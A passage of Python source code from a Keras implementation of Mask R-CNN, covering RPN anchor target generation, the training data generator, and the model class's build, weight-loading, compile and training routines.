GT box with IoU < 0.3 then it's negative. # Neutral anchors are those that don't match the conditions above, # and they don't influence the loss function. # However, don't keep any GT box unmatched (rare, but happens). Instead, # match it to the closest anchor (even if its max IoU is < 0.3). # # 1. Set negative anchors first. They get overwritten below if a GT box is # matched to them. Skip boxes in crowd areas. anchor_iou_argmax = np.argmax(overlaps, axis=1) anchor_iou_max = overlaps[np.arange(overlaps.shape[0]), anchor_iou_argmax] rpn_match[(anchor_iou_max < 0.3) & (no_crowd_bool)] = -1 # 2. Set an anchor for each GT box (regardless of IoU value). # If multiple anchors have the same IoU match all of them gt_iou_argmax = np.argwhere(overlaps == np.max(overlaps, axis=0))[:,0] rpn_match[gt_iou_argmax] = 1 # 3. Set anchors with high overlap as positive. rpn_match[anchor_iou_max >= 0.7] = 1 # Subsample to balance positive and negative anchors # Don't let positives be more than half the anchors ids = np.where(rpn_match == 1)[0] extra = len(ids) - (config.RPN_TRAIN_ANCHORS_PER_IMAGE // 2) if extra > 0: # Reset the extra ones to neutral ids = np.random.choice(ids, extra, replace=False) rpn_match[ids] = 0 # Same for negative proposals ids = np.where(rpn_match == -1)[0] extra = len(ids) - (config.RPN_TRAIN_ANCHORS_PER_IMAGE - np.sum(rpn_match == 1)) if extra > 0: # Rest the extra ones to neutral ids = np.random.choice(ids, extra, replace=False) rpn_match[ids] = 0 # For positive anchors, compute shift and scale needed to transform them # to match the corresponding GT boxes. ids = np.where(rpn_match == 1)[0] ix = 0 # index into rpn_bbox # TODO: use box_refinement() rather than duplicating the code here for i, a in zip(ids, anchors[ids]): # Closest gt box (it might have IoU < 0.7) gt = gt_boxes[anchor_iou_argmax[i]] # Convert coordinates to center plus width/height. # GT Box gt_h = gt[2] - gt[0] gt_w = gt[3] - gt[1] gt_center_y = gt[0] + 0.5 * gt_h gt_center_x = gt[1] + 0.5 * gt_w # Anchor a_h = a[2] - a[0] a_w = a[3] - a[1] a_center_y = a[0] + 0.5 * a_h a_center_x = a[1] + 0.5 * a_w # Compute the bbox refinement that the RPN should predict. rpn_bbox[ix] = [ (gt_center_y - a_center_y) / a_h, (gt_center_x - a_center_x) / a_w, np.log(gt_h / a_h), np.log(gt_w / a_w), ] # Normalize rpn_bbox[ix] /= config.RPN_BBOX_STD_DEV ix += 1 return rpn_match, rpn_bbox def generate_random_rois(image_shape, count, gt_class_ids, gt_boxes): """Generates ROI proposals similar to what a region proposal network would generate. image_shape: [Height, Width, Depth] count: Number of ROIs to generate gt_class_ids: [N] Integer ground truth class IDs gt_boxes: [N, (y1, x1, y2, x2)] Ground truth boxes in pixels. Returns: [count, (y1, x1, y2, x2)] ROI boxes in pixels. """ # placeholder rois = np.zeros((count, 4), dtype=np.int32) # Generate random ROIs around GT boxes (90% of count) rois_per_box = int(0.9 * count / gt_boxes.shape[0]) for i in range(gt_boxes.shape[0]): gt_y1, gt_x1, gt_y2, gt_x2 = gt_boxes[i] h = gt_y2 - gt_y1 w = gt_x2 - gt_x1 # random boundaries r_y1 = max(gt_y1 - h, 0) r_y2 = min(gt_y2 + h, image_shape[0]) r_x1 = max(gt_x1 - w, 0) r_x2 = min(gt_x2 + w, image_shape[1]) # To avoid generating boxes with zero area, we generate double what # we need and filter out the extra. If we get fewer valid boxes # than we need, we loop and try again. while True: y1y2 = np.random.randint(r_y1, r_y2, (rois_per_box * 2, 2)) x1x2 = np.random.randint(r_x1, r_x2, (rois_per_box * 2, 2)) # Filter out zero area boxes threshold = 1 y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >= threshold][:rois_per_box] x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >= threshold][:rois_per_box] if y1y2.shape[0] == rois_per_box and x1x2.shape[0] == rois_per_box: break # Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape # into x1, y1, x2, y2 order x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1) y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1) box_rois = np.hstack([y1, x1, y2, x2]) rois[rois_per_box * i:rois_per_box * (i + 1)] = box_rois # Generate random ROIs anywhere in the image (10% of count) remaining_count = count - (rois_per_box * gt_boxes.shape[0]) # To avoid generating boxes with zero area, we generate double what # we need and filter out the extra. If we get fewer valid boxes # than we need, we loop and try again. while True: y1y2 = np.random.randint(0, image_shape[0], (remaining_count * 2, 2)) x1x2 = np.random.randint(0, image_shape[1], (remaining_count * 2, 2)) # Filter out zero area boxes threshold = 1 y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >= threshold][:remaining_count] x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >= threshold][:remaining_count] if y1y2.shape[0] == remaining_count and x1x2.shape[0] == remaining_count: break # Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape # into x1, y1, x2, y2 order x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1) y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1) global_rois = np.hstack([y1, x1, y2, x2]) rois[-remaining_count:] = global_rois return rois def data_generator(dataset, config, shuffle=True, augment=False, augmentation=None, random_rois=0, batch_size=1, detection_targets=False, no_augmentation_sources=None): """A generator that returns images and corresponding target class ids, bounding box deltas, and masks. dataset: The Dataset object to pick data from config: The model config object shuffle: If True, shuffles the samples before every epoch augment: (deprecated. Use augmentation instead). If true, apply random image augmentation. Currently, only horizontal flipping is offered. augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation. For example, passing imgaug.augmenters.Fliplr(0.5) flips images right/left 50% of the time. random_rois: If > 0 then generate proposals to be used to train the network classifier and mask heads. Useful if training the Mask RCNN part without the RPN. batch_size: How many images to return in each call detection_targets: If True, generate detection targets (class IDs, bbox deltas, and masks). Typically for debugging or visualizations because in trainig detection targets are generated by DetectionTargetLayer. no_augmentation_sources: Optional. List of sources to exclude for augmentation. A source is string that identifies a dataset and is defined in the Dataset class. Returns a Python generator. Upon calling next() on it, the generator returns two lists, inputs and outputs. The contents of the lists differs depending on the received arguments: inputs list: - images: [batch, H, W, C] - image_meta: [batch, (meta data)] Image details. See compose_image_meta() - rpn_match: [batch, N] Integer (1=positive anchor, -1=negative, 0=neutral) - rpn_bbox: [batch, N, (dy, dx, log(dh), log(dw))] Anchor bbox deltas. - gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs - gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] - gt_masks: [batch, height, width, MAX_GT_INSTANCES]. The height and width are those of the image unless use_mini_mask is True, in which case they are defined in MINI_MASK_SHAPE. outputs list: Usually empty in regular training. But if detection_targets is True then the outputs list contains target class_ids, bbox deltas, and masks. """ b = 0 # batch item index image_index = -1 image_ids = np.copy(dataset.image_ids) error_count = 0 no_augmentation_sources = no_augmentation_sources or [] # Anchors # [anchor_count, (y1, x1, y2, x2)] backbone_shapes = compute_backbone_shapes(config, config.IMAGE_SHAPE) anchors = utils.generate_pyramid_anchors(config.RPN_ANCHOR_SCALES, config.RPN_ANCHOR_RATIOS, backbone_shapes, config.BACKBONE_STRIDES, config.RPN_ANCHOR_STRIDE) # Keras requires a generator to run indefinitely. while True: try: # Increment index to pick next image. Shuffle if at the start of an epoch. image_index = (image_index + 1) % len(image_ids) if shuffle and image_index == 0: np.random.shuffle(image_ids) # Get GT bounding boxes and masks for image. image_id = image_ids[image_index] # If the image source is not to be augmented pass None as augmentation if dataset.image_info[image_id]['source'] in no_augmentation_sources: image, image_meta, gt_class_ids, gt_boxes, gt_masks = \ load_image_gt(dataset, config, image_id, augment=augment, augmentation=None, use_mini_mask=config.USE_MINI_MASK) else: image, image_meta, gt_class_ids, gt_boxes, gt_masks = \ load_image_gt(dataset, config, image_id, augment=augment, augmentation=augmentation, use_mini_mask=config.USE_MINI_MASK) # Skip images that have no instances. This can happen in cases # where we train on a subset of classes and the image doesn't # have any of the classes we care about. if not np.any(gt_class_ids > 0): continue # RPN Targets rpn_match, rpn_bbox = build_rpn_targets(image.shape, anchors, gt_class_ids, gt_boxes, config) # Mask R-CNN Targets if random_rois: rpn_rois = generate_random_rois( image.shape, random_rois, gt_class_ids, gt_boxes) if detection_targets: rois, mrcnn_class_ids, mrcnn_bbox, mrcnn_mask =\ build_detection_targets( rpn_rois, gt_class_ids, gt_boxes, gt_masks, config) # Init batch arrays if b == 0: batch_image_meta = np.zeros( (batch_size,) + image_meta.shape, dtype=image_meta.dtype) batch_rpn_match = np.zeros( [batch_size, anchors.shape[0], 1], dtype=rpn_match.dtype) batch_rpn_bbox = np.zeros( [batch_size, config.RPN_TRAIN_ANCHORS_PER_IMAGE, 4], dtype=rpn_bbox.dtype) batch_images = np.zeros( (batch_size,) + image.shape, dtype=np.float32) batch_gt_class_ids = np.zeros( (batch_size, config.MAX_GT_INSTANCES), dtype=np.int32) batch_gt_boxes = np.zeros( (batch_size, config.MAX_GT_INSTANCES, 4), dtype=np.int32) batch_gt_masks = np.zeros( (batch_size, gt_masks.shape[0], gt_masks.shape[1], config.MAX_GT_INSTANCES), dtype=gt_masks.dtype) if random_rois: batch_rpn_rois = np.zeros( (batch_size, rpn_rois.shape[0], 4), dtype=rpn_rois.dtype) if detection_targets: batch_rois = np.zeros( (batch_size,) + rois.shape, dtype=rois.dtype) batch_mrcnn_class_ids = np.zeros( (batch_size,) + mrcnn_class_ids.shape, dtype=mrcnn_class_ids.dtype) batch_mrcnn_bbox = np.zeros( (batch_size,) + mrcnn_bbox.shape, dtype=mrcnn_bbox.dtype) batch_mrcnn_mask = np.zeros( (batch_size,) + mrcnn_mask.shape, dtype=mrcnn_mask.dtype) # If more instances than fits in the array, sub-sample from them. if gt_boxes.shape[0] > config.MAX_GT_INSTANCES: ids = np.random.choice( np.arange(gt_boxes.shape[0]), config.MAX_GT_INSTANCES, replace=False) gt_class_ids = gt_class_ids[ids] gt_boxes = gt_boxes[ids] gt_masks = gt_masks[:, :, ids] # Add to batch batch_image_meta[b] = image_meta batch_rpn_match[b] = rpn_match[:, np.newaxis] batch_rpn_bbox[b] = rpn_bbox batch_images[b] = mold_image(image.astype(np.float32), config) batch_gt_class_ids[b, :gt_class_ids.shape[0]] = gt_class_ids batch_gt_boxes[b, :gt_boxes.shape[0]] = gt_boxes batch_gt_masks[b, :, :, :gt_masks.shape[-1]] = gt_masks if random_rois: batch_rpn_rois[b] = rpn_rois if detection_targets: batch_rois[b] = rois batch_mrcnn_class_ids[b] = mrcnn_class_ids batch_mrcnn_bbox[b] = mrcnn_bbox batch_mrcnn_mask[b] = mrcnn_mask b += 1 # Batch full? if b >= batch_size: inputs = [batch_images, batch_image_meta, batch_rpn_match, batch_rpn_bbox, batch_gt_class_ids, batch_gt_boxes, batch_gt_masks] outputs = [] if random_rois: inputs.extend([batch_rpn_rois]) if detection_targets: inputs.extend([batch_rois]) # Keras requires that output and targets have the same number of dimensions batch_mrcnn_class_ids = np.expand_dims( batch_mrcnn_class_ids, -1) outputs.extend( [batch_mrcnn_class_ids, batch_mrcnn_bbox, batch_mrcnn_mask]) yield inputs, outputs # start a new batch b = 0 except (GeneratorExit, KeyboardInterrupt): raise except: # Log it and skip the image logging.exception("Error processing image {}".format( dataset.image_info[image_id])) error_count += 1 if error_count > 5: raise ############################################################ # MaskRCNN Class ############################################################ class MaskRCNN(): """Encapsulates the Mask RCNN model functionality. The actual Keras model is in the keras_model property. """ def __init__(self, mode, config, model_dir): """ mode: Either "training" or "inference" config: A Sub-class of the Config class model_dir: Directory to save training logs and trained weights """ assert mode in ['training', 'inference'] self.mode = mode self.config = config self.model_dir = model_dir self.set_log_dir() self.keras_model = self.build(mode=mode, config=config) def build(self, mode, config): """Build Mask R-CNN architecture. input_shape: The shape of the input image. mode: Either "training" or "inference". The inputs and outputs of the model differ accordingly. """ assert mode in ['training', 'inference'] # Image size must be dividable by 2 multiple times h, w = config.IMAGE_SHAPE[:2] if h / 2**6 != int(h / 2**6) or w / 2**6 != int(w / 2**6): raise Exception("Image size must be dividable by 2 at least 6 times " "to avoid fractions when downscaling and upscaling." "For example, use 256, 320, 384, 448, 512, ... etc. ") # Inputs input_image = KL.Input( shape=[None, None, config.IMAGE_SHAPE[2]], name="input_image") input_image_meta = KL.Input(shape=[config.IMAGE_META_SIZE], name="input_image_meta") if mode == "training": # RPN GT input_rpn_match = KL.Input( shape=[None, 1], name="input_rpn_match", dtype=tf.int32) input_rpn_bbox = KL.Input( shape=[None, 4], name="input_rpn_bbox", dtype=tf.float32) # Detection GT (class IDs, bounding boxes, and masks) # 1. GT Class IDs (zero padded) input_gt_class_ids = KL.Input( shape=[None], name="input_gt_class_ids", dtype=tf.int32) # 2. GT Boxes in pixels (zero padded) # [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in image coordinates input_gt_boxes = KL.Input( shape=[None, 4], name="input_gt_boxes", dtype=tf.float32) # Normalize coordinates gt_boxes = KL.Lambda(lambda x: norm_boxes_graph( x, K.shape(input_image)[1:3]))(input_gt_boxes) # 3. GT Masks (zero padded) # [batch, height, width, MAX_GT_INSTANCES] if config.USE_MINI_MASK: input_gt_masks = KL.Input( shape=[config.MINI_MASK_SHAPE[0], config.MINI_MASK_SHAPE[1], None], name="input_gt_masks", dtype=bool) else: input_gt_masks = KL.Input( shape=[config.IMAGE_SHAPE[0], config.IMAGE_SHAPE[1], None], name="input_gt_masks", dtype=bool) elif mode == "inference": # Anchors in normalized coordinates input_anchors = KL.Input(shape=[None, 4], name="input_anchors") # Build the shared convolutional layers. # Bottom-up Layers # Returns a list of the last layers of each stage, 5 in total. # Don't create the thead (stage 5), so we pick the 4th item in the list. if callable(config.BACKBONE): _, C2, C3, C4, C5 = config.BACKBONE(input_image, stage5=True, train_bn=config.TRAIN_BN) else: _, C2, C3, C4, C5 = resnet_graph(input_image, config.BACKBONE, stage5=True, train_bn=config.TRAIN_BN) # Top-down Layers # TODO: add assert to varify feature map sizes match what's in config P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c5p5')(C5) P4 = KL.Add(name="fpn_p4add")([ KL.UpSampling2D(size=(2, 2), name="fpn_p5upsampled")(P5), KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c4p4')(C4)]) P3 = KL.Add(name="fpn_p3add")([ KL.UpSampling2D(size=(2, 2), name="fpn_p4upsampled")(P4), KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c3p3')(C3)]) P2 = KL.Add(name="fpn_p2add")([ KL.UpSampling2D(size=(2, 2), name="fpn_p3upsampled")(P3), KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c2p2')(C2)]) # Attach 3x3 conv to all P layers to get the final feature maps. P2 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p2")(P2) P3 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p3")(P3) P4 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p4")(P4) P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p5")(P5) # P6 is used for the 5th anchor scale in RPN. Generated by # subsampling from P5 with stride of 2. P6 = KL.MaxPooling2D(pool_size=(1, 1), strides=2, name="fpn_p6")(P5) # Note that P6 is used in RPN, but not in the classifier heads. rpn_feature_maps = [P2, P3, P4, P5, P6] mrcnn_feature_maps = [P2, P3, P4, P5] # Anchors if mode == "training": anchors = self.get_anchors(config.IMAGE_SHAPE) # Duplicate across the batch dimension because Keras requires it # TODO: can this be optimized to avoid duplicating the anchors? anchors = np.broadcast_to(anchors, (config.BATCH_SIZE,) + anchors.shape) # A hack to get around Keras's bad support for constants anchors = KL.Lambda(lambda x: tf.Variable(anchors), name="anchors")(input_image) else: anchors = input_anchors # RPN Model rpn = build_rpn_model(config.RPN_ANCHOR_STRIDE, len(config.RPN_ANCHOR_RATIOS), config.TOP_DOWN_PYRAMID_SIZE) # Loop through pyramid layers layer_outputs = [] # list of lists for p in rpn_feature_maps: layer_outputs.append(rpn([p])) # Concatenate layer outputs # Convert from list of lists of level outputs to list of lists # of outputs across levels. # e.g. [[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]] output_names = ["rpn_class_logits", "rpn_class", "rpn_bbox"] outputs = list(zip(*layer_outputs)) outputs = [KL.Concatenate(axis=1, name=n)(list(o)) for o, n in zip(outputs, output_names)] rpn_class_logits, rpn_class, rpn_bbox = outputs # Generate proposals # Proposals are [batch, N, (y1, x1, y2, x2)] in normalized coordinates # and zero padded. proposal_count = config.POST_NMS_ROIS_TRAINING if mode == "training"\ else config.POST_NMS_ROIS_INFERENCE rpn_rois = ProposalLayer( proposal_count=proposal_count, nms_threshold=config.RPN_NMS_THRESHOLD, name="ROI", config=config)([rpn_class, rpn_bbox, anchors]) if mode == "training": # Class ID mask to mark class IDs supported by the dataset the image # came from. active_class_ids = KL.Lambda( lambda x: parse_image_meta_graph(x)["active_class_ids"] )(input_image_meta) if not config.USE_RPN_ROIS: # Ignore predicted ROIs and use ROIs provided as an input. input_rois = KL.Input(shape=[config.POST_NMS_ROIS_TRAINING, 4], name="input_roi", dtype=np.int32) # Normalize coordinates target_rois = KL.Lambda(lambda x: norm_boxes_graph( x, K.shape(input_image)[1:3]))(input_rois) else: target_rois = rpn_rois # Generate detection targets # Subsamples proposals and generates target outputs for training # Note that proposal class IDs, gt_boxes, and gt_masks are zero # padded. Equally, returned rois and targets are zero padded. rois, target_class_ids, target_bbox, target_mask =\ DetectionTargetLayer(config, name="proposal_targets")([ target_rois, input_gt_class_ids, gt_boxes, input_gt_masks]) # Network Heads # TODO: verify that this handles zero padded ROIs mrcnn_class_logits, mrcnn_class, mrcnn_bbox =\ fpn_classifier_graph(rois, mrcnn_feature_maps, input_image_meta, config.POOL_SIZE, config.NUM_CLASSES, train_bn=config.TRAIN_BN, fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE) mrcnn_mask = build_fpn_mask_graph(rois, mrcnn_feature_maps, input_image_meta, config.MASK_POOL_SIZE, config.NUM_CLASSES, train_bn=config.TRAIN_BN) # TODO: clean up (use tf.identify if necessary) output_rois = KL.Lambda(lambda x: x * 1, name="output_rois")(rois) # Losses rpn_class_loss = KL.Lambda(lambda x: rpn_class_loss_graph(*x), name="rpn_class_loss")( [input_rpn_match, rpn_class_logits]) rpn_bbox_loss = KL.Lambda(lambda x: rpn_bbox_loss_graph(config, *x), name="rpn_bbox_loss")( [input_rpn_bbox, input_rpn_match, rpn_bbox]) class_loss = KL.Lambda(lambda x: mrcnn_class_loss_graph(*x), name="mrcnn_class_loss")( [target_class_ids, mrcnn_class_logits, active_class_ids]) bbox_loss = KL.Lambda(lambda x: mrcnn_bbox_loss_graph(*x), name="mrcnn_bbox_loss")( [target_bbox, target_class_ids, mrcnn_bbox]) mask_loss = KL.Lambda(lambda x: mrcnn_mask_loss_graph(*x), name="mrcnn_mask_loss")( [target_mask, target_class_ids, mrcnn_mask]) # Model inputs = [input_image, input_image_meta, input_rpn_match, input_rpn_bbox, input_gt_class_ids, input_gt_boxes, input_gt_masks] if not config.USE_RPN_ROIS: inputs.append(input_rois) outputs = [rpn_class_logits, rpn_class, rpn_bbox, mrcnn_class_logits, mrcnn_class, mrcnn_bbox, mrcnn_mask, rpn_rois, output_rois, rpn_class_loss, rpn_bbox_loss, class_loss, bbox_loss, mask_loss] model = KM.Model(inputs, outputs, name='mask_rcnn') else: # Network Heads # Proposal classifier and BBox regressor heads mrcnn_class_logits, mrcnn_class, mrcnn_bbox =\ fpn_classifier_graph(rpn_rois, mrcnn_feature_maps, input_image_meta, config.POOL_SIZE, config.NUM_CLASSES, train_bn=config.TRAIN_BN, fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE) # Detections # output is [batch, num_detections, (y1, x1, y2, x2, class_id, score)] in # normalized coordinates detections = DetectionLayer(config, name="mrcnn_detection")( [rpn_rois, mrcnn_class, mrcnn_bbox, input_image_meta]) # Create masks for detections detection_boxes = KL.Lambda(lambda x: x[..., :4])(detections) mrcnn_mask = build_fpn_mask_graph(detection_boxes, mrcnn_feature_maps, input_image_meta, config.MASK_POOL_SIZE, config.NUM_CLASSES, train_bn=config.TRAIN_BN) model = KM.Model([input_image, input_image_meta, input_anchors], [detections, mrcnn_class, mrcnn_bbox, mrcnn_mask, rpn_rois, rpn_class, rpn_bbox], name='mask_rcnn') # Add multi-GPU support. if config.GPU_COUNT > 1: from mrcnn.parallel_model import ParallelModel model = ParallelModel(model, config.GPU_COUNT) return model def find_last(self): """Finds the last checkpoint file of the last trained model in the model directory. Returns: The path of the last checkpoint file """ # Get directory names. Each directory corresponds to a model dir_names = next(os.walk(self.model_dir))[1] key = self.config.NAME.lower() dir_names = filter(lambda f: f.startswith(key), dir_names) dir_names = sorted(dir_names) if not dir_names: import errno raise FileNotFoundError( errno.ENOENT, "Could not find model directory under {}".format(self.model_dir)) # Pick last directory dir_name = os.path.join(self.model_dir, dir_names[-1]) # Find the last checkpoint checkpoints = next(os.walk(dir_name))[2] checkpoints = filter(lambda f: f.startswith("mask_rcnn"), checkpoints) checkpoints = sorted(checkpoints) if not checkpoints: import errno raise FileNotFoundError( errno.ENOENT, "Could not find weight files in {}".format(dir_name)) checkpoint = os.path.join(dir_name, checkpoints[-1]) return checkpoint def load_weights(self, filepath, by_name=False, exclude=None): """Modified version of the corresponding Keras function with the addition of multi-GPU support and the ability to exclude some layers from loading. exclude: list of layer names to exclude """ import h5py # Conditional import to support versions of Keras before 2.2 # TODO: remove in about 6 months (end of 2018) try: from keras.engine import saving except ImportError: # Keras before 2.2 used the 'topology' namespace. from keras.engine import topology as saving if exclude: by_name = True if h5py is None: raise ImportError('`load_weights` requires h5py.') f = h5py.File(filepath, mode='r') if 'layer_names' not in f.attrs and 'model_weights' in f: f = f['model_weights'] # In multi-GPU training, we wrap the model. Get layers # of the inner model because they have the weights. keras_model = self.keras_model layers = keras_model.inner_model.layers if hasattr(keras_model, "inner_model")\ else keras_model.layers # Exclude some layers if exclude: layers = filter(lambda l: l.name not in exclude, layers) if by_name: saving.load_weights_from_hdf5_group_by_name(f, layers) else: saving.load_weights_from_hdf5_group(f, layers) if hasattr(f, 'close'): f.close() # Update the log directory self.set_log_dir(filepath) def get_imagenet_weights(self): """Downloads ImageNet trained weights from Keras. Returns path to weights file. """ from keras.utils.data_utils import get_file TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/'\ 'releases/download/v0.2/'\ 'resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5' weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5', TF_WEIGHTS_PATH_NO_TOP, cache_subdir='models', md5_hash='a268eb855778b3df3c7506639542a6af') return weights_path def compile(self, learning_rate, momentum): """Gets the model ready for training. Adds losses, regularization, and metrics. Then calls the Keras compile() function. """ # Optimizer object optimizer = keras.optimizers.SGD( lr=learning_rate, momentum=momentum, clipnorm=self.config.GRADIENT_CLIP_NORM) # Add Losses # First, clear previously set losses to avoid duplication self.keras_model._losses = [] self.keras_model._per_input_losses = {} loss_names = [ "rpn_class_loss", "rpn_bbox_loss", "mrcnn_class_loss", "mrcnn_bbox_loss", "mrcnn_mask_loss"] for name in loss_names: layer = self.keras_model.get_layer(name) if layer.output in self.keras_model.losses: continue loss = ( tf.reduce_mean(layer.output, keepdims=True) * self.config.LOSS_WEIGHTS.get(name, 1.)) self.keras_model.add_loss(loss) # Add L2 Regularization # Skip gamma and beta weights of batch normalization layers. reg_losses = [ keras.regularizers.l2(self.config.WEIGHT_DECAY)(w) / tf.cast(tf.size(w), tf.float32) for w in self.keras_model.trainable_weights if 'gamma' not in w.name and 'beta' not in w.name] self.keras_model.add_loss(tf.add_n(reg_losses)) # Compile self.keras_model.compile( optimizer=optimizer, loss=[None] * len(self.keras_model.outputs)) # Add metrics for losses for name in loss_names: if name in self.keras_model.metrics_names: continue layer = self.keras_model.get_layer(name) self.keras_model.metrics_names.append(name) loss = ( tf.reduce_mean(layer.output, keepdims=True) * self.config.LOSS_WEIGHTS.get(name, 1.)) self.keras_model.metrics_tensors.append(loss) def set_trainable(self, layer_regex, keras_model=None, indent=0, verbose=1): """Sets model layers as trainable if their names match the given regular expression. """ # Print message on the first call (but not on recursive calls) if verbose > 0 and keras_model is None: log("Selecting layers to train") keras_model = keras_model or self.keras_model # In multi-GPU training, we wrap the model. Get layers # of the inner model because they have the weights. layers = keras_model.inner_model.layers if hasattr(keras_model, "inner_model")\ else keras_model.layers for layer in layers: # Is the layer a model? if layer.__class__.__name__ == 'Model': print("In model: ", layer.name) self.set_trainable( layer_regex, keras_model=layer, indent=indent + 4) continue if not layer.weights: continue # Is it trainable? trainable = bool(re.fullmatch(layer_regex, layer.name)) # Update layer. If layer is a container, update inner layer. if layer.__class__.__name__ == 'TimeDistributed': layer.layer.trainable = trainable else: layer.trainable = trainable # Print trainable layer names if trainable and verbose > 0: log("{}{:20} ({})".format(" " * indent, layer.name, layer.__class__.__name__)) def set_log_dir(self, model_path=None): """Sets the model log directory and epoch counter. model_path: If None, or a format different from what this code uses then set a new log directory and start epochs from 0. Otherwise, extract the log directory and the epoch counter from the file name. """ # Set date and epoch counter as if starting a new model self.epoch = 0 now = datetime.datetime.now() # If we have a model path with date and epochs use them if model_path: # Continue from we left of. Get epoch and date from the file name # A sample model path might look like: # \path\to\logs\coco20171029T2315\mask_rcnn_coco_0001.h5 (Windows) # /path/to/logs/coco20171029T2315/mask_rcnn_coco_0001.h5 (Linux) regex = r".*[/\\][\w-]+(\d{4})(\d{2})(\d{2})T(\d{2})(\d{2})[/\\]mask\_rcnn\_[\w-]+(\d{4})\.h5" m = re.match(regex, model_path) if m: now = datetime.datetime(int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4)), int(m.group(5))) # Epoch number in file is 1-based, and in Keras code it's 0-based. # So, adjust for that then increment by one to start from the next epoch self.epoch = int(m.group(6)) - 1 + 1 print('Re-starting from epoch %d' % self.epoch) # Directory for training logs self.log_dir = os.path.join(self.model_dir, "{}{:%Y%m%dT%H%M}".format( self.config.NAME.lower(), now)) # Path to save after each epoch. Include placeholders that get filled by Keras. self.checkpoint_path = os.path.join(self.log_dir, "mask_rcnn_{}_*epoch*.h5".format( self.config.NAME.lower())) self.checkpoint_path = self.checkpoint_path.replace( "*epoch*", "{epoch:04d}") def train(self, train_dataset, val_dataset, learning_rate, epochs, layers, augmentation=None, custom_callbacks=None, no_augmentation_sources=None): """Train the model. train_dataset, val_dataset: Training and validation Dataset objects. learning_rate: The learning rate to train with epochs: Number of training epochs. Note that previous training epochs are considered to be done alreay, so this actually determines the epochs to train in total rather than in this particaular call. layers: Allows selecting wich layers to train. It can be: - A regular expression to match layer names to train - One of these predefined values: heads: The RPN, classifier and mask heads of the network all: All the layers 3+: Train Resnet stage 3 and up 4+: Train Resnet stage 4 and up 5+: Train Resnet stage 5 and up augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation. For example, passing imgaug.augmenters.Fliplr(0.5) flips images right/left 50% of the time. You can pass complex augmentations as well. This augmentation applies 50% of the time, and when it does it flips images right/left half the time and adds a Gaussian blur with a random sigma in range 0 to 5. augmentation = imgaug.augmenters.Sometimes(0.5, [ imgaug.augmenters.Fliplr(0.5), imgaug.augmenters.GaussianBlur(sigma=(0.0, 5.0)) ]) custom_callbacks: Optional. Add custom callbacks to be called with the keras fit_generator method. Must be list of type keras.callbacks. no_augmentation_sources: Optional. List of sources to exclude for augmentation. A source is string that identifies a dataset and is defined in the Dataset class. """ assert self.mode == "training", "Create model in training mode." # Pre-defined layer regular expressions layer_regex = { # all layers but the backbone "heads": r"(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)", # From a specific Resnet stage and up "3+": r"(res3.*)|(bn3.*)|(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)", "4+": r"(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)", "5+": r"(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)", # All layers "all": ".*", } if layers in layer_regex.keys(): layers = layer_regex[layers] # Data generators train_generator = data_generator(train_dataset, self.config, shuffle=True, augmentation=augmentation, batch_size=self.config.BATCH_SIZE, no_augmentation_sources=no_augmentation_sources) val_generator = data_generator(val_dataset, self.config, shuffle=True, batch_size=self.config.BATCH_SIZE) # Create log_dir if it does not exist if not os.path.exists(self.log_dir): os.makedirs(self.log_dir) # Callbacks callbacks = [ keras.callbacks.TensorBoard(log_dir=self.log_dir, histogram_freq=0, write_graph=True, write_images=False), keras.callbacks.ModelCheckpoint(self.checkpoint_path, verbose=0, save_weights_only=True), ] # Add custom callbacks to the list if custom_callbacks: callbacks += custom_callbacks # Train log("\nStarting at epoch {}. LR={}\n".format(self.epoch, learning_rate)) log("Checkpoint Path: {}".format(self.checkpoint_path)) self.set_trainable(layers) self.compile(learning_rate, self.config.LEARNING_MOMENTUM) # Work-around for Windows: Keras fails on Windows when using # multiprocessing workers. See discussion here: # https://github.com/matterport/Mask_RCNN/issues/13#issuecomment-353124009 if os.name is 'nt': workers = 0 else: workers = multiprocessing.cpu_count() self.keras_model.fit_generator( train_generator, initial_epoch=self.epoch, epochs=epochs, steps_per_epoch=self.config.STEPS_PER_EPOCH, callbacks=callbacks, validation_data=val_generator, validation_steps=self.config.VALIDATION_STEPS, max_queue_size=100, 